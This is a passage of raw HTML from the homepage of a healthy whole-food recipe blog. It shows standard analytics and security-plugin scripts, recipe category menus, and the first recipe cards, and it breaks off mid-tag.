rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.livingchirpy.com/wp-includes/wlwmanifest.xml" /><link rel='shortlink' href='https://www.livingchirpy.com/' /><style type='text/css'>.ae_data .elementor-editor-element-setting{display:none!important}</style><script type="text/javascript">(function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.livingchirpy.com/?wordfence_lh=1&hid=EDAF0905E193052BCBE95BDDCBF33C0C');</script><style type="text/css">.wprm-comment-rating svg path,.comment-form-wprm-rating svg path{fill:#93b823}.comment-form-wprm-rating .rated svg polygon{fill:#93b823}.wprm-comment-rating svg polygon,.comment-form-wprm-rating svg polygon{stroke:#93b823}</style> <script>(function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:1205667,hjsv:5}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'//static.hotjar.com/c/hotjar-','.js?sv=');</script> <script type='text/javascript'>!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js');</script> <script type='text/javascript'>fbq('init', '424282411668892', [], { "agent": "wordpress-5.2-1.7.25" });</script><script type='text/javascript'>fbq('track', 'PageView', []);</script> <noscript> <img height="1" width="1" style="display:none" alt="fbpx" src="https://www.facebook.com/tr?id=424282411668892&ev=PageView&noscript=1" /> </noscript><link rel="icon" href="https://www.livingchirpy.com/wp-content/uploads/2019/02/cropped-Living-Chirpy-LC-Favicon-2-32x32.png" sizes="32x32" /><link rel="icon" href="https://www.livingchirpy.com/wp-content/uploads/2019/02/cropped-Living-Chirpy-LC-Favicon-2-192x192.png" sizes="192x192" /><link rel="apple-touch-icon-precomposed" href="https://www.livingchirpy.com/wp-content/uploads/2019/02/cropped-Living-Chirpy-LC-Favicon-2-180x180.png" /><meta name="msapplication-TileImage" content="https://www.livingchirpy.com/wp-content/uploads/2019/02/cropped-Living-Chirpy-LC-Favicon-2-270x270.png" /> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-63792820-1', 'auto'); ga('send', 'pageview');</script> <style type="text/css" id="wp-custom-css">@media only screen and (min-width:1025px){.mv-content-archive{max-width:calc(100% - 320px)}.mv-sidebar-archive{min-width:320px}.mv-content-post{max-width:calc(100% - 390px)}.mv-sidebar-post{min-width:390px}}@media only screen and (max-width:1024px) and (min-width:768px){.mv-content-archive,.mv-sidebar-archive,.mv-content-post,.mv-sidebar-post{width:100%!important}}@media only screen and (max-width:413px) and (min-width:360px){.elementor-widget-theme-post-content>.elementor-widget-container{padding-left:20px!important;padding-right:20px!important}}@media only screen and (max-width:374px){.wprm-recipe-template-lc-recipe-template-container{padding-left:0;padding-right:0}}@media only screen and (max-width:359px){.elementor-widget-theme-post-content>.elementor-widget-container{padding-left:10px!important;padding-right:10px!important}.wprm-recipe.wprm-recipe-template-lc-recipe-template{border:none!important}}.grecaptcha-badge{display:none}</style><noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player,[data-lazy-src]{display:none!important}</style></noscript></head><body itemtype='https://schema.org/WebPage' itemscope='itemscope' class="home page-template page-template-elementor_header_footer page page-id-8377 wp-custom-logo ast-desktop ast-page-builder-template ast-right-sidebar astra-1.8.3 ast-header-custom-item-inside group-blog ast-single-post ast-mobile-inherit-site-logo ast-inherit-site-logo-transparent ast-normal-title-enabled elementor-default elementor-template-full-width elementor-page elementor-page-8377"><div id="page" class="hfeed site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a><div data-elementor-type="header" data-elementor-id="8421" class="elementor elementor-8421 elementor-bc-flex-widget elementor-location-header" data-elementor-settings="[]"><div class="elementor-inner"><div class="elementor-section-wrap"><section class="elementor-element elementor-element-5f747eb1 elementor-section-content-middle elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="5f747eb1" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-container elementor-column-gap-no"><div class="elementor-row"><div class="elementor-element elementor-element-7badac5c elementor-column elementor-col-25 elementor-top-column" data-id="7badac5c" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-24cc6bba elementor-widget elementor-widget-theme-site-logo elementor-widget-image" data-id="24cc6bba" data-element_type="widget" data-widget_type="theme-site-logo.default"><div class="elementor-widget-container"><div class="elementor-image"> <a href="https://www.livingchirpy.com" data-elementor-open-lightbox=""> <img width="490" height="343" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20490%20343'%3E%3C/svg%3E" class="attachment-full size-full" alt="" data-lazy-srcset="https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2.png 490w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-150x105.png 150w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-300x210.png 300w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-152x106.png 152w" data-lazy-sizes="(max-width: 490px) 100vw, 490px" data-lazy-src="https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-152x106.png" /><noscript><img width="490" height="343" src="https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-152x106.png" class="attachment-full size-full" alt="" srcset="https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2.png 490w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-150x105.png 150w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-300x210.png 300w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-152x106.png 152w" sizes="(max-width: 490px) 100vw, 490px" /></noscript> </a></div></div></div></div></div></div><div class="elementor-element elementor-element-dc21ab elementor-column elementor-col-25 elementor-top-column" data-id="dc21ab" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-e61469d elementor-hidden-phone elementor-widget elementor-widget-heading" data-id="e61469d" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">••• Search By •••</h2></div></div><div class="elementor-element elementor-element-10b91f3c elementor-nav-menu__align-center elementor-nav-menu--stretch elementor-nav-menu--dropdown-mobile elementor-nav-menu--indicator-classic elementor-nav-menu__text-align-aside elementor-nav-menu--toggle elementor-nav-menu--burger elementor-widget elementor-widget-nav-menu" data-id="10b91f3c" data-element_type="widget" data-settings="{&quot;full_width&quot;:&quot;stretch&quot;,&quot;layout&quot;:&quot;horizontal&quot;,&quot;toggle&quot;:&quot;burger&quot;}" data-widget_type="nav-menu.default"><div class="elementor-widget-container"><nav class="elementor-nav-menu--main elementor-nav-menu__container elementor-nav-menu--layout-horizontal e--pointer-text e--animation-grow"><ul id="menu-1-10b91f3c" class="elementor-nav-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9277"><a href="https://www.livingchirpy.com/category/recipes/" class="elementor-item">All Recipes</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6568"><a href="https://www.livingchirpy.com/category/type/" class="elementor-item">Type</a><ul class="sub-menu elementor-nav-menu--dropdown"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9181"><a href="https://www.livingchirpy.com/category/main-meals/" class="elementor-sub-item">Main Meals</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6503"><a href="https://www.livingchirpy.com/category/sides/" class="elementor-sub-item">Sides</a><ul class="sub-menu elementor-nav-menu--dropdown"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8942"><a href="https://www.livingchirpy.com/category/sides/salad/" class="elementor-sub-item">Salads</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8943"><a href="https://www.livingchirpy.com/category/sides/vegetables/" class="elementor-sub-item">Vegetables</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8941"><a href="https://www.livingchirpy.com/category/sides/grains-legumes/" class="elementor-sub-item">Grains And Legumes</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6564"><a href="https://www.livingchirpy.com/category/breakfast/" class="elementor-sub-item">Breakfast</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8944"><a href="https://www.livingchirpy.com/category/type/appetizers-small-bites/" class="elementor-sub-item">Appetizers</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8947"><a href="https://www.livingchirpy.com/category/type/soup-chili-stew/" class="elementor-sub-item">Soup, Chili, Stew</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8945"><a href="https://www.livingchirpy.com/category/type/sauces-salsa-spices/" class="elementor-sub-item">Sauces, Salsa, Spices</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8949"><a href="https://www.livingchirpy.com/category/type/zoodles-noodles/" class="elementor-sub-item">Zoodles and Noodles</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8948"><a href="https://www.livingchirpy.com/category/type/sweet-treats/" class="elementor-sub-item">Sweet Treats</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8946"><a href="https://www.livingchirpy.com/category/type/snacks/" class="elementor-sub-item">Snacks</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6569"><a href="https://www.livingchirpy.com/category/drinks/" class="elementor-sub-item">Drinks</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6567"><a href="https://www.livingchirpy.com/category/ingredient/" class="elementor-item">Main Ingredient</a><ul class="sub-menu elementor-nav-menu--dropdown"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8936"><a href="https://www.livingchirpy.com/category/ingredient/beef/" class="elementor-sub-item">Beef</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8937"><a href="https://www.livingchirpy.com/category/ingredient/chicken/" class="elementor-sub-item">Chicken</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8940"><a href="https://www.livingchirpy.com/category/ingredient/pork/" class="elementor-sub-item">Pork</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8938"><a href="https://www.livingchirpy.com/category/ingredient/fish-seafood/" class="elementor-sub-item">Fish and Seafood</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8939"><a href="https://www.livingchirpy.com/category/ingredient/lamb/" class="elementor-sub-item">Lamb</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6507"><a href="https://www.livingchirpy.com/category/diet/" class="elementor-item">Diet</a><ul class="sub-menu elementor-nav-menu--dropdown"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8931"><a href="https://www.livingchirpy.com/category/diet/lowcarb-keto/" class="elementor-sub-item">Low-Carb and Keto</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8933"><a href="https://www.livingchirpy.com/category/diet/paleo/" class="elementor-sub-item">Paleo</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8932"><a href="https://www.livingchirpy.com/category/diet/whole30/" class="elementor-sub-item">Whole30</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8934"><a href="https://www.livingchirpy.com/category/diet/vegetarian-diet/" class="elementor-sub-item">Vegetarian</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8930"><a href="https://www.livingchirpy.com/category/diet/glutenfree/" class="elementor-sub-item">Gluten-Free</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8935"><a href="https://www.livingchirpy.com/category/roundups/" class="elementor-item">Roundups</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9437"><a href="https://www.livingchirpy.com/category/blog/" class="elementor-item">Blog</a></li></ul></nav><div class="elementor-menu-toggle"> <i class="eicon" aria-hidden="true"></i> <span class="elementor-screen-only">Menu</span></div><nav class="elementor-nav-menu--dropdown elementor-nav-menu__container"><ul id="menu-2-10b91f3c" class="elementor-nav-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9277"><a href="https://www.livingchirpy.com/category/recipes/" class="elementor-item">All Recipes</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6568"><a href="https://www.livingchirpy.com/category/type/" class="elementor-item">Type</a><ul class="sub-menu elementor-nav-menu--dropdown"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9181"><a href="https://www.livingchirpy.com/category/main-meals/" class="elementor-sub-item">Main Meals</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6503"><a href="https://www.livingchirpy.com/category/sides/" class="elementor-sub-item">Sides</a><ul class="sub-menu elementor-nav-menu--dropdown"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8942"><a href="https://www.livingchirpy.com/category/sides/salad/" class="elementor-sub-item">Salads</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8943"><a href="https://www.livingchirpy.com/category/sides/vegetables/" class="elementor-sub-item">Vegetables</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8941"><a href="https://www.livingchirpy.com/category/sides/grains-legumes/" class="elementor-sub-item">Grains And Legumes</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6564"><a href="https://www.livingchirpy.com/category/breakfast/" class="elementor-sub-item">Breakfast</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8944"><a href="https://www.livingchirpy.com/category/type/appetizers-small-bites/" class="elementor-sub-item">Appetizers</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8947"><a href="https://www.livingchirpy.com/category/type/soup-chili-stew/" class="elementor-sub-item">Soup, Chili, Stew</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8945"><a href="https://www.livingchirpy.com/category/type/sauces-salsa-spices/" class="elementor-sub-item">Sauces, Salsa, Spices</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8949"><a href="https://www.livingchirpy.com/category/type/zoodles-noodles/" class="elementor-sub-item">Zoodles and Noodles</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8948"><a href="https://www.livingchirpy.com/category/type/sweet-treats/" class="elementor-sub-item">Sweet Treats</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8946"><a href="https://www.livingchirpy.com/category/type/snacks/" class="elementor-sub-item">Snacks</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6569"><a href="https://www.livingchirpy.com/category/drinks/" class="elementor-sub-item">Drinks</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6567"><a href="https://www.livingchirpy.com/category/ingredient/" class="elementor-item">Main Ingredient</a><ul class="sub-menu elementor-nav-menu--dropdown"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8936"><a href="https://www.livingchirpy.com/category/ingredient/beef/" class="elementor-sub-item">Beef</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8937"><a href="https://www.livingchirpy.com/category/ingredient/chicken/" class="elementor-sub-item">Chicken</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8940"><a href="https://www.livingchirpy.com/category/ingredient/pork/" class="elementor-sub-item">Pork</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8938"><a href="https://www.livingchirpy.com/category/ingredient/fish-seafood/" class="elementor-sub-item">Fish and Seafood</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8939"><a href="https://www.livingchirpy.com/category/ingredient/lamb/" class="elementor-sub-item">Lamb</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6507"><a href="https://www.livingchirpy.com/category/diet/" class="elementor-item">Diet</a><ul class="sub-menu elementor-nav-menu--dropdown"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8931"><a href="https://www.livingchirpy.com/category/diet/lowcarb-keto/" class="elementor-sub-item">Low-Carb and Keto</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8933"><a href="https://www.livingchirpy.com/category/diet/paleo/" class="elementor-sub-item">Paleo</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8932"><a href="https://www.livingchirpy.com/category/diet/whole30/" class="elementor-sub-item">Whole30</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8934"><a href="https://www.livingchirpy.com/category/diet/vegetarian-diet/" class="elementor-sub-item">Vegetarian</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8930"><a href="https://www.livingchirpy.com/category/diet/glutenfree/" class="elementor-sub-item">Gluten-Free</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8935"><a href="https://www.livingchirpy.com/category/roundups/" class="elementor-item">Roundups</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9437"><a href="https://www.livingchirpy.com/category/blog/" class="elementor-item">Blog</a></li></ul></nav></div></div></div></div></div><div class="elementor-element elementor-element-655e3ae elementor-column elementor-col-25 elementor-top-column" data-id="655e3ae" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-309cd29 elementor-shape-circle elementor-widget elementor-widget-social-icons" data-id="309cd29" data-element_type="widget" data-widget_type="social-icons.default"><div class="elementor-widget-container"><div class="elementor-social-icons-wrapper"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-animation-shrink" href="http://facebook.com/livingchirpy/" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fa fa-facebook"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-pinterest elementor-animation-shrink" href="http://pinterest.com/livingchirpy" target="_blank"> <span class="elementor-screen-only">Pinterest</span> <i class="fa fa-pinterest"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-instagram elementor-animation-shrink" href="http://instagram.com/livingchirpy/" target="_blank"> <span class="elementor-screen-only">Instagram</span> <i class="fa fa-instagram"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-animation-shrink" href="https://www.youtube.com/channel/UC-hzyeYBjLgGNBy3SVTZW7w" target="_blank"> <span class="elementor-screen-only">Youtube</span> <i class="fa fa-youtube"></i> </a></div></div></div></div></div></div><div class="elementor-element elementor-element-1bf51dc elementor-column elementor-col-25 elementor-top-column" data-id="1bf51dc" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-97fd2a1 elementor-search-form--skin-full_screen elementor-widget elementor-widget-search-form" data-id="97fd2a1" data-element_type="widget" data-settings="{&quot;skin&quot;:&quot;full_screen&quot;}" data-widget_type="search-form.default"><div class="elementor-widget-container"><form class="elementor-search-form" role="search" action="https://www.livingchirpy.com" method="get"><div class="elementor-search-form__toggle"> <i class="fa fa-search" aria-hidden="true"></i> <span class="elementor-screen-only">Search</span></div><div class="elementor-search-form__container"> <input placeholder="Search..." class="elementor-search-form__input" type="search" name="s" title="Search" value=""><div class="dialog-lightbox-close-button dialog-close-button"> <i class="eicon-close" aria-hidden="true"></i> <span class="elementor-screen-only">Close</span></div></div></form></div></div></div></div></div></div></div></section></div></div></div><div id="content" class="site-content"><div class="ast-container"><div data-elementor-type="post" data-elementor-id="8377" class="elementor elementor-8377 elementor-bc-flex-widget" data-elementor-settings="[]"><div class="elementor-inner"><div class="elementor-section-wrap"><section class="elementor-element elementor-element-8e424ea elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="8e424ea" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;gradient&quot;}"><div class="elementor-background-overlay"></div><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-df81d4e elementor-column elementor-col-100 elementor-top-column" data-id="df81d4e" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-bc21b0c elementor-widget elementor-widget-heading" data-id="bc21b0c" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">The Home Of Healthy Whole Food Recipes!</h2></div></div><div class="elementor-element elementor-element-59670f5 elementor-posts--align-center elementor-grid-tablet-3 elementor-grid-3 elementor-grid-mobile-1 elementor-posts--thumbnail-top elementor-posts__hover-gradient elementor-widget elementor-widget-posts" data-id="59670f5" data-element_type="widget" data-settings="{&quot;cards_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:18,&quot;sizes&quot;:[]},&quot;cards_columns_tablet&quot;:&quot;3&quot;,&quot;cards_columns&quot;:&quot;3&quot;,&quot;cards_columns_mobile&quot;:&quot;1&quot;}" data-widget_type="posts.cards"><div class="elementor-widget-container"><div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-cards"><article class="elementor-post elementor-grid-item post-1660 post type-post status-publish format-standard has-post-thumbnail hentry category-appetizers-small-bites category-beef category-diet category-featured category-glutenfree category-lowcarb-keto category-main-meals category-recipes category-top-25"><div class="elementor-post__card"> <a class="elementor-post__thumbnail__link" href="https://www.livingchirpy.com/spanakopita-meatballs-with-tzatziki/"><div class="elementor-post__thumbnail"><img width="300" height="224" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20224'%3E%3C/svg%3E" class="attachment-medium size-medium" alt="Greek Spanakopita Spinach &amp; Feta Meatballs" data-lazy-srcset="https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-300x224.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-150x112.jpg 150w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-768x575.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-80x60.jpg 80w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-265x198.jpg 265w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-485x360.jpg 485w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-696x521.jpg 696w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-561x420.jpg 561w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-500x375.jpg 500w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7.jpg 850w" data-lazy-sizes="(max-width: 300px) 100vw, 300px" data-lazy-src="https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-300x224.jpg" /><noscript><img width="300" height="224" src="https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-300x224.jpg" class="attachment-medium size-medium" alt="Greek Spanakopita Spinach &amp; Feta Meatballs" srcset="https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-300x224.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-150x112.jpg 150w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-768x575.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-80x60.jpg 80w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-265x198.jpg 265w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-485x360.jpg 485w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-696x521.jpg 696w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-561x420.jpg 561w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7-500x375.jpg 500w, https://www.livingchirpy.com/wp-content/uploads/2019/01/Greek-Spanakopita-Spinach-Feta-Meatballs-7.jpg 850w" sizes="(max-width: 300px) 100vw, 300px" /></noscript></div> </a><div class="elementor-post__text"><h2 class="elementor-post__title"> <a href="https://www.livingchirpy.com/spanakopita-meatballs-with-tzatziki/"> Greek Spinach and Feta Spanakopita Meatballs [Low-Carb, Keto] </a></h2></div></div></article><article class="elementor-post elementor-grid-item post-8140 post type-post status-publish format-standard has-post-thumbnail hentry category-chicken category-featured category-glutenfree category-lowcarb-keto category-main-meals category-recipes"><div class="elementor-post__card"> <a class="elementor-post__thumbnail__link" href="https://www.livingchirpy.com/cheddar-broccoli-chicken-casserole-with-cauliflower-rice/"><div class="elementor-post__thumbnail"><img width="300" height="225" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20300%20225'%3E%3C/svg%3E" class="attachment-medium size-medium" alt="One Pan Cheesy Cauliflower Rice with Broccoli and Chicken" data-lazy-srcset="https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-300x225.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-150x112.jpg 150w, https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-768x576.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-80x60.jpg 80w, https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-265x198.jpg 265w, https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-696x522.jpg 696w, https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-560x420.jpg 560w, https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-500x375.jpg 500w, https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8.jpg 850w" data-lazy-sizes="(max-width: 300px) 100vw, 300px" data-lazy-src="https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-300x225.jpg" /><noscript><img width="300" height="225" src="https://www.livingchirpy.com/wp-content/uploads/2018/12/One-Pan-Cheesy-Cauliflower-Rice-with-Broccoli-and-Chicken-8-300x225.jpg" class="attachment-medium size-medium" alt="One Pan Cheesy Cauliflower Rice with Broccoli and Chicken" 